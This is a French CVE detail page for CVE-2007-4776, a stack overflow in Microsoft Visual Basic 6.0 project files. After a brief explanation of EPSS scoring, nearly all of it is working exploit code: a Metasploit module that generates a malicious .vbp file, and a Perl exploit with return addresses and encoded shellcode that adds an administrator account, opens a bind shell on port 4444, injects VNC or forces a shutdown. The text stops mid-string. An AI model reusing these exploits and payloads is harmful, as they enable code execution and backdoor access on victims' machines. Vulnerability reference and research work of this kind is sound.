CVE-2007-4776 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

## # $Id: ms_visual_basic_vbp.rb 10477 2010-09-25 11:59:02Z mc $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Visual Basic VBP Buffer Overflow', 'Description' => %q{ This module exploits a stack oveflow in Microsoft Visual Basic 6.0. When a specially crafted vbp file containing a long reference line, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], 'Version' => '$Revision: 10477 $', 'References' => [ [ 'CVE', '2007-4776' ], [ 'OSVDB', '36936' ], [ 'BID', '25629' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'DisablePayloadHandler' => 'true', }, 'Payload' => { 'Space' => 650, 'BadChars' => "\x00\x0a\x0d\x20", 'StackAdjustment' => -3500, 'DisableNops' => 'True', }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP2 English', { 'Ret' => 0x0fabd271, 'Scratch' => 0x7ffddfb4 } ], ], 'Privileged' => false, 'DisclosureDate' => 'Sep 4 2007', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ true, 'The file name.', 'msf.vbp']), ], self.class) end def exploit sploit = rand_text_alpha_upper(496) + [target.ret].pack('V') sploit << rand_text_alpha_upper(12) + [target['Scratch']].pack('V') sploit << make_nops(24) + payload.encoded vbp = "Type=Exe\r\n" vbp << "Form=Form2.frm\r\n" vbp << "Reference=*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\\..\\..\\..\\WINNT\\System32\\stdole2.tlb#OLE Automation" vbp << sploit + "\r\n" vbp << "Startup=\"Form2\"\r\n" vbp << "Command32=\"\"\r\n" vbp << "Name=\"Project2\"\r\n" vbp << "HelpContextID=\"0\"\r\n" vbp << "CompatibleMode=\"0\"\r\n" vbp << "MajorVer=1\r\n" vbp << "MinorVer=0\r\n" vbp << "RevisionVer=0\r\n" vbp << "AutoIncrementVer=0\r\n" vbp << "ServerSupportFiles=0\r\n" vbp << "VersionCompanyName=\"\"\r\n" vbp << "CompilationType=0\r\n" vbp << "OptimizationType=0\r\n" vbp << "FavorPentiumPro(tm)=0\r\n" vbp << "CodeViewDebugInfo=0\r\n" vbp << "NoAliasing=0\r\n" vbp << "BoundsCheck=0\r\n" vbp << "OverflowCheck=0\r\n" vbp << "FlPointCheck=0\r\n" vbp << "FDIVCheck=0\r\n" vbp << "UnroundedFP=0\r\n" vbp << "StartMode=0\r\n" vbp << "Unattended=0\r\n" vbp << "Retained=0\r\n" vbp << "ThreadPerObject=0\r\n" vbp << "MaxNumberOfThreads=1\r\n" vbp << "[MS Transaction Server]\r\n" vbp << "AutoRefresh=1\r\n" print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(vbp) end end

#!/usr/bin/perl #' ++ Microsoft Visual Basic 6.0 Code Execution 0-Day ++ #' ++++++++++++++++++++++++++++++++++++++++++++++++++++++ #'++ Author: Koshi + #'++ Email: heykoshi at gmail dot com + #'++ Application: Microsoft Visual Basic 6.0 + #'++ + #'++ Tested on Microsoft Windows XP Home Edition SP2 + #'++ Patched & Updated + #'++ + #'++ The vulnerable buffer exsists in the .VBP files of + #'++ Visual Basic projects. You can jump directly to + #'++ the shellcode, or jump to it via EBP. + #'++ + #'++ There is NO restriction of shellcode size either. + #'++ + #'++ Gr33tz: Rima my baby who I love and adore, Draven + #'++ for pointing me in the right direction, as always. + #'++ + #'++ + #'++ This exploit is for educational use only, blah. + #'++ + #'++ + #'+++++++++++++++++++++++++++++++++++++++++++++++++++++++ #'+++++++++++++++++++++++++++++++++++++++++++++++++++++ # # Ex. of Usage: # perl vb6.pl 1 >>Project.vbp # # $begin0 = "\x54\x79\x70\x65\x3D\x45\x78\x65\x0D\x0A\x46\x6F\x72\x6D". "\x3D\x46\x6F\x72\x6D\x31\x2E\x66\x72\x6D\x0D\x0A"; $begin1 = "\x52\x65\x66\x65\x72\x65\x6E\x63\x65\x3D". "\x2A\x5C\x47\x7B\x30\x30\x30\x32\x30\x34\x33\x30\x2D\x30". "\x30\x30\x30\x2D\x30\x30\x30\x30\x2D\x43\x30\x30\x30\x2D". "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x34\x36\x7D\x23". "\x32\x2E\x30\x23\x30\x23\x2E\x2E\x5C\x2E\x2E\x5C\x2E\x2E". "\x5C\x2E\x2E\x5C\x2E\x2E\x5C\x57\x49\x4E\x44\x4F\x57\x53". "\x5C\x73\x79\x73\x74\x65\x6D\x33\x32\x5C\x73\x74\x64\x6F". "\x6C\x65\x32\x2E\x74\x6C\x62\x23\x4F\x4C\x45\x20\x41\x75". "\x74\x6F\x6D\x61\x74\x69\x6F\x6E"; $begin2 = "\x0D\x0A\x53\x74\x61\x72\x74\x75\x70\x3D\x22\x46\x6F\x72\x6D\x31\x22\x0D\x0A". "\x43\x6F\x6D\x6D\x61\x6E\x64\x33\x32\x3D\x22\x22"; $BuffOf = "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41"; $codeAddr = "\x83\x25\x40\x01"; # You can most likely use a call or a push, you could probably use them from kernel32.dll too. #* ntdll.dll - 0x7C923DA3 jmp Ebp **** Is the one i have used in this example. # 0x77f6d42f jmp ebp ntdll.dll (English / 5.2.3790.3) Windows 2003 Server 5.2.0.0 SP0 (IA32) # 0x77f7d9b6 jmp ebp ntdll.dll (English / 5.1.2600.11061) Windows XP 5.1.1.0 SP1 (IA32) # 0x77f8c449 jmp ebp ntdll.dll (English / 5.0.2163.1) Windows 2000 5.0.0.0 SP0 (IA32) # 0x77faa6ce jmp ebp ntdll.dll (English / 5.2.3790.3) Windows 2003 Server 5.2.0.0 SP0 (IA32) # 0x7c85eb73 jmp ebp ntdll.dll (English / 5.2.3790.1830031) Windows 2003 Server 5.2.1.0 SP1 (IA32) # 0x7c8839ed jmp ebp ntdll.dll (English / 5.2.3790.1830031) Windows 2003 Server 5.2.1.0 SP1 (IA32) #*0x7c923da3 jmp ebp ntdll.dll (English / 5.1.2600.21802) Windows XP 5.1.2.0 SP2 (IA32) # 0x77f8c449 jmp ebp ntdll.dll (French / 5.0.2163.1) Windows 2000 5.0.0.0 SP0 (IA32) # 0x77f6d9b6 jmp ebp ntdll.dll (German / 5.1.2600.11061) Windows XP 5.1.1.0 SP1 (IA32) # 0x7c933da3 jmp ebp ntdll.dll (German / 5.1.2600.21802) Windows XP 5.1.2.0 SP2 (IA32) # 0x77f5d42f jmp ebp ntdll.dll (Italian / 5.2.3790.3) No associated versions # 0x77f6d9b6 jmp ebp ntdll.dll (Italian / 5.1.2600.11061) Windows XP 5.1.1.0 SP1 (IA32) # 0x77f8c449 jmp ebp ntdll.dll (Italian / 5.0.2163.1) Windows 2000 5.0.0.0 SP0 (IA32) # 0x77f9a6ce jmp ebp ntdll.dll (Italian / 5.2.3790.3) No associated versions # 0x7c96eb73 jmp ebp ntdll.dll (Italian / 5.2.3790.1830031) No associated versions # 0x7c9939ed jmp ebp ntdll.dll (Italian / 5.2.3790.1830031) No associated versions # ...backwards..if you don't know why, then gtfo. $jmpEbp = "\xA3\x3D\x92\x7C"; $fourSkin = "\x44\x44\x44\x44"; $begin3 = "\x0D\x0A\x4E\x61\x6D\x65\x3D\x22\x50\x72\x6F\x6A\x65\x63". "\x74\x31\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41"; $koshi = "\x0D\x0A\x48\x65\x6C\x70\x43\x6F\x6E\x74\x65\x78\x74\x49\x44\x3D\x22\x30\x22\x0D\x0A\x43\x6F\x6D". "\x70\x61\x74\x69\x62\x6C\x65\x4D\x6F\x64\x65\x3D\x22\x30\x22\x0D\x0A\x4D\x61\x6A\x6F\x72\x56\x65". "\x72\x3D\x31\x0D\x0A\x4D\x69\x6E\x6F\x72\x56\x65\x72\x3D\x30\x0D\x0A\x52\x65\x76\x69\x73\x69\x6F". "\x6E\x56\x65\x72\x3D\x30\x0D\x0A\x41\x75\x74\x6F\x49\x6E\x63\x72\x65\x6D\x65\x6E\x74\x56\x65\x72". "\x3D\x30\x0D\x0A\x53\x65\x72\x76\x65\x72\x53\x75\x70\x70\x6F\x72\x74\x46\x69\x6C\x65\x73\x3D\x30". "\x0D\x0A\x43\x6F\x6D\x70\x69\x6C\x61\x74\x69\x6F\x6E\x54\x79\x70\x65\x3D\x30\x0D\x0A\x4F\x70\x74". "\x69\x6D\x69\x7A\x61\x74\x69\x6F\x6E\x54\x79\x70\x65\x3D\x30\x0D\x0A\x46\x61\x76\x6F\x72\x50\x65". "\x6E\x74\x69\x75\x6D\x50\x72\x6F\x28\x74\x6D\x29\x3D\x30\x0D\x0A\x43\x6F\x64\x65\x56\x69\x65\x77". "\x44\x65\x62\x75\x67\x49\x6E\x66\x6F\x3D\x30\x0D\x0A\x4E\x6F\x41\x6C\x69\x61\x73\x69\x6E\x67\x3D". "\x30\x0D\x0A\x42\x6F\x75\x6E\x64\x73\x43\x68\x65\x63\x6B\x3D\x30\x0D\x0A\x4F\x76\x65\x72\x66\x6C". "\x6F\x77\x43\x68\x65\x63\x6B\x3D\x30\x0D\x0A\x46\x6C\x50\x6F\x69\x6E\x74\x43\x68\x65\x63\x6B\x3D". "\x30\x0D\x0A\x46\x44\x49\x56\x43\x68\x65\x63\x6B\x3D\x30\x0D\x0A\x55\x6E\x72\x6F\x75\x6E\x64\x65". "\x64\x46\x50\x3D\x30\x0D\x0A\x53\x74\x61\x72\x74\x4D\x6F\x64\x65\x3D\x30\x0D\x0A\x55\x6E\x61\x74". "\x74\x65\x6E\x64\x65\x64\x3D\x30\x0D\x0A\x52\x65\x74\x61\x69\x6E\x65\x64\x3D\x30\x0D\x0A\x54\x68". "\x72\x65\x61\x64\x50\x65\x72\x4F\x62\x6A\x65\x63\x74\x3D\x30\x0D\x0A\x4D\x61\x78\x4E\x75\x6D\x62". "\x65\x72\x4F\x66\x54\x68\x72\x65\x61\x64\x73\x3D\x31\x0D\x0A\x0D\x0A\x5B\x4D\x53\x20\x54\x72\x61". "\x6E\x73\x61\x63\x74\x69\x6F\x6E\x20\x53\x65\x72\x76\x65\x72\x5D\x0D\x0A\x41\x75\x74\x6F\x52\x65". "\x66\x72\x65\x73\x68\x3D\x31\x0D\x0A"; # win32_exec - EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com $shellc1 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". "\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47". "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38". "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48". "\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c". "\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e". "\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58". "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44". "\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38". "\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33". "\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47". "\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a". "\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b". "\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33". "\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37". "\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59". "\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56". "\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a"; # win32_adduser - PASS=koshi EXITFUNC=seh USER=4dmin Size=495 Encoder=PexAlphaNum http://metasploit.com $shellc2 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44". "\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x44\x4e\x53\x4b\x38\x4e\x37". "\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x38\x4f\x54\x4a\x51\x4b\x58". "\x4f\x35\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x48". "\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c". "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". "\x46\x4f\x4b\x53\x46\x55\x46\x52\x46\x30\x45\x47\x45\x4e\x4b\x48". "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x50\x4b\x54". "\x4b\x48\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x58". "\x41\x30\x4b\x4e\x49\x38\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". "\x42\x4c\x46\x46\x4b\x58\x42\x34\x42\x53\x45\x48\x42\x4c\x4a\x37". "\x4e\x30\x4b\x48\x42\x44\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a". "\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b". "\x42\x30\x42\x30\x42\x50\x4b\x58\x4a\x36\x4e\x53\x4f\x45\x41\x53". "\x48\x4f\x42\x36\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57". "\x42\x55\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x46\x4a\x59". "\x50\x4f\x4c\x58\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x36\x4d\x46". "\x46\x56\x50\x42\x45\x36\x4a\x37\x45\x56\x42\x32\x4f\x52\x43\x46". "\x42\x42\x50\x56\x45\x46\x46\x47\x42\x52\x45\x47\x43\x37\x45\x36". "\x44\x57\x42\x42\x46\x53\x46\x36\x4d\x56\x49\x46\x50\x56\x42\x32". "\x4b\x36\x4f\x36\x43\x37\x4a\x46\x49\x36\x42\x32\x4f\x42\x41\x34". "\x46\x54\x46\x34\x42\x32\x48\x52\x48\x52\x42\x52\x50\x36\x45\x46". "\x46\x57\x42\x42\x4e\x56\x4f\x36\x43\x36\x41\x36\x4e\x46\x47\x56". "\x44\x37\x4f\x36\x45\x57\x42\x57\x42\x52\x41\x44\x46\x56\x4d\x56". "\x49\x46\x50\x56\x49\x46\x43\x47\x46\x57\x44\x37\x41\x36\x46\x57". "\x4f\x46\x44\x37\x43\x37\x42\x32\x46\x43\x46\x36\x4d\x56\x49\x36". "\x50\x56\x42\x42\x4f\x32\x41\x44\x46\x54\x46\x54\x42\x50\x5a"; # win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com $shellc3 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e". "\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x38". "\x4e\x36\x46\x52\x46\x32\x4b\x38\x45\x54\x4e\x53\x4b\x48\x4e\x37". "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x58". "\x4f\x45\x42\x52\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x48". "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c". "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e". "\x46\x4f\x4b\x33\x46\x35\x46\x32\x4a\x32\x45\x57\x45\x4e\x4b\x48". "\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x54". "\x4b\x58\x4f\x35\x4e\x31\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x58". "\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x46\x43\x4c\x41\x33\x4b\x4d". "\x46\x46\x4b\x48\x43\x34\x42\x53\x4b\x58\x42\x54\x4e\x30\x4b\x48". "\x42\x57\x4e\x31\x4d\x4a\x4b\x48\x42\x44\x4a\x50\x50\x45\x4a\x46". "\x50\x38\x50\x34\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x46". "\x43\x45\x48\x56\x4a\x36\x43\x53\x44\x33\x4a\x46\x47\x57\x43\x37". "\x44\x53\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e". "\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x38\x45\x4e". "\x48\x36\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x36\x44\x50". "\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45". "\x4f\x4f\x48\x4d\x43\x45\x43\x45\x43\x55\x43\x55\x43\x55\x43\x54". "\x43\x45\x43\x54\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x31". "\x4e\x35\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x59\x4a\x46\x46\x4a". "\x4c\x41\x42\x47\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x46\x42\x31". "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x32". "\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d". "\x4a\x56\x45\x4e\x49\x44\x48\x38\x49\x34\x47\x55\x4f\x4f\x48\x4d". "\x42\x45\x46\x45\x46\x45\x45\x35\x4f\x4f\x42\x4d\x43\x59\x4a\x36". "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x35\x4f\x4f\x48\x4d\x45\x45". "\x4f\x4f\x42\x4d\x48\x56\x4c\x36\x46\x56\x48\x46\x4a\x36\x43\x46". "\x4d\x36\x49\x38\x45\x4e\x4c\x46\x42\x35\x49\x45\x49\x32\x4e\x4c". "\x49\x48\x47\x4e\x4c\x56\x46\x54\x49\x48\x44\x4e\x41\x43\x42\x4c". "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x54\x4e\x42". "\x43\x59\x4d\x38\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36". "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x47\x46\x54\x4f\x4f". "\x48\x4d\x4b\x45\x47\x45\x44\x35\x41\x35\x41\x45\x41\x55\x4c\x46". "\x41\x30\x41\x45\x41\x45\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x36". "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x56". "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x48\x47\x35\x4e\x4f". "\x43\x38\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d". "\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x55\x43\x45\x4f\x4f\x48\x4d". "\x4f\x4f\x42\x4d\x5a"; # win32_bind_vncinject - VNCDLL=/home/opcode/msfweb/framework/data/vncdll.dll EXITFUNC=seh AUTOVNC=1 VNCPORT=5900 LPORT=4444 Size=649 Encoder=PexAlphaNum http://metasploit.com $shellc4 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4a\x4e\x48\x55\x42\x50". "\x42\x30\x42\x30\x43\x55\x45\x35\x48\x45\x47\x45\x4b\x38\x4e\x36". "\x46\x42\x4a\x31\x4b\x38\x45\x54\x4e\x33\x4b\x48\x46\x55\x45\x30". "\x4a\x47\x41\x50\x4c\x4e\x4b\x58\x4c\x54\x4a\x31\x4b\x48\x4c\x55". "\x42\x42\x41\x50\x4b\x4e\x43\x4e\x44\x43\x49\x54\x4b\x58\x46\x33". "\x4b\x48\x41\x30\x50\x4e\x41\x33\x4f\x4f\x4e\x4f\x41\x43\x42\x4c". "\x4e\x4a\x4a\x53\x42\x4e\x46\x57\x47\x30\x41\x4c\x4f\x4c\x4d\x30". "\x41\x30\x47\x4c\x4b\x4e\x44\x4f\x4b\x33\x4e\x47\x46\x42\x46\x51". "\x45\x37\x41\x4e\x4b\x38\x4c\x35\x46\x52\x41\x30\x4b\x4e\x48\x56". "\x4b\x58\x4e\x50\x4b\x54\x4b\x48\x4c\x55\x4e\x51\x41\x30\x4b\x4e". "\x4b\x58\x46\x30\x4b\x58\x41\x50\x4a\x4e\x4b\x4e\x44\x50\x41\x43". "\x42\x4c\x4f\x35\x50\x35\x4d\x35\x4b\x45\x44\x4c\x4a\x50\x42\x50". "\x50\x55\x4c\x36\x42\x33\x49\x55\x46\x46\x4b\x58\x49\x31\x4b\x38". "\x4b\x45\x4e\x50\x4b\x38\x4b\x35\x4e\x31\x4b\x48\x4b\x51\x4b\x58". "\x4b\x45\x4a\x30\x43\x55\x4a\x56\x50\x38\x50\x34\x50\x50\x4e\x4e". "\x4f\x4f\x48\x4d\x49\x48\x47\x4c\x41\x58\x4e\x4e\x42\x50\x41\x50". "\x42\x50\x42\x30\x47\x45\x48\x55\x43\x45\x49\x38\x45\x4e\x4a\x4e". "\x47\x52\x42\x30\x42\x30\x42\x30\x42\x59\x41\x50\x42\x30\x42\x50". "\x48\x4b\x49\x51\x4a\x51\x47\x4e\x46\x4a\x49\x31\x42\x47\x49\x4e". "\x45\x4e\x49\x54\x48\x58\x49\x54\x46\x4a\x4c\x51\x42\x37\x47\x4c". "\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x49\x4d\x49\x50\x45\x4f\x4d\x4a". "\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x43\x47\x45\x43\x35\x44\x33\x4f\x45". "\x43\x33\x44\x43\x42\x30\x4b\x45\x4d\x38\x4b\x34\x42\x42\x41\x55". "\x4f\x4f\x47\x4d\x49\x58\x4f\x4d\x49\x38\x43\x4c\x4d\x58\x45\x47". "\x46\x41\x4c\x36\x47\x30\x49\x45\x41\x35\x43\x45\x4f\x4f\x46\x43". "\x4f\x38\x4f\x4f\x45\x35\x46\x50\x49\x35\x49\x58\x46\x50\x50\x48". "\x44\x4e\x44\x4f\x4b\x32\x47\x52\x46\x35\x4f\x4f\x47\x43\x4f\x4f". "\x45\x35\x42\x43\x41\x53\x42\x4c\x42\x45\x42\x35\x42\x35\x42\x55". "\x42\x54\x42\x55\x42\x44\x42\x35\x4f\x4f\x45\x45\x4e\x32\x49\x48". "\x47\x4c\x41\x53\x4b\x4d\x43\x45\x43\x45\x4a\x46\x44\x30\x42\x50". "\x41\x31\x4e\x55\x49\x48\x42\x4e\x4c\x36\x42\x31\x42\x35\x47\x55". "\x4f\x4f\x45\x35\x46\x32\x43\x55\x47\x45\x4f\x4f\x45\x45\x4a\x32". "\x43\x55\x46\x35\x47\x45\x4f\x4f\x45\x55\x42\x32\x49\x48\x47\x4c". "\x41\x58\x4e\x4e\x42\x50\x42\x31\x42\x50\x42\x50\x49\x58\x43\x4e". "\x4c\x46\x42\x50\x4a\x46\x42\x30\x42\x51\x42\x30\x42\x30\x43\x35". "\x47\x45\x4f\x4f\x45\x35\x4a\x31\x41\x58\x4e\x4e\x42\x30\x46\x30". "\x42\x30\x42\x30\x4f\x4f\x43\x4d\x5a"; # win32_exec - EXITFUNC=seh CMD=shutdown -c "HAI VEn0m pwn3d j00r b0x0r wif k0sh1 u b1tch" Size=451 Encoder=PexAlphaNum http://metasploit.com $shellc5 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". 